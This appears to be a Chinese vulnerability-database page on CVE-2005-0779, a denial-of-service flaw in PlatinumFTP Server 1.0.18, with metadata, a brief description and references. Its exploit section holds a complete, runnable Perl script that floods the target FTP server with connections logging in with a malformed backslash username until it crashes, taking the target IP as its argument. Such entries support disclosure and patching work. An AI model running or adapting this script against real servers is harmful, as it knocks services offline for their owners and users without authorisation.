Platinum FTP Server拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1108500 漏洞类型 其他
发布时间 2005-03-05 更新时间 2007-01-04
CVE编号 CVE-2005-0779 CNNVD-ID CNNVD-200505-405
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/25218
https://www.securityfocus.com/bid/12790
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-405
|漏洞详情
PlatinumFTPServer是Windows平台下的一款强大的FTP服务器。PlatinumFTPServer中存在拒绝服务漏洞。如果远程用户发起了50个以上的连接,以畸形用户名认证的话,就可能造成拒绝服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/12790/info

PlatinumFTPServer is prone to a denial-of-service vulnerability. This issue is reported to occur when a remote user makes 50 or more connections that attempt to authenticate with a malformed user name. 

#!/usr/bin/perl
# plftpdos1.pl - Remote DoS against PlatinumFTP 10.1.18 using \
# 
# If you don't get the server down try to change/play a little bit with
# the Timeout

# 2005/05/03
#
# ports at securityforest dot com | greetings to muts, barabas, s|33py,
# revised and all guys at www.whitehat.co.il


use strict;
use Net::FTP;

my $host;
my $username = '\\';

if ($#ARGV < 0) { &syntax(); }
$host = @ARGV[0]; 

my $ftp = Net::FTP->new($host, Timeout => 2, Debug => 0, Port => 21) or die "can you see a ftp server? i can't.\n";

print "denial of service in progress\n";

while (my $ftp = Net::FTP->new($host, Timeout => 2, Debug => 0, Port => 21))
{
    my $ftp = Net::FTP->new($host, Timeout => 0.1, Debug => 0, Port => 21);
    $ftp->login($username);
}

print "server is down. now run forest, RUN!\n";

sub syntax {
    print "\nUsage: pftpdos1.pl IP\n";
    exit (1);
    }
|受影响的产品
PlatinumFTP PlatinumFTPserver 1.0.18
|参考资料

来源:XF
名称:platinumftp-username-dos(19674)
链接:http://xforce.iss.net/xforce/xfdb/19674
来源:BID
名称:12790
链接:http://www.securityfocus.com/bid/12790
来源:BUGTRAQ
名称:20050312PlatinumFTP1.0.18remoteDoS
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111066232415249&w=2
来源:BUGTRAQ
名称:20070101Re:PlatinumFTP1.0.18remoteDoS
链接:http://www.securityfocus.com/archive/1/archive/1/455609/100/0/threaded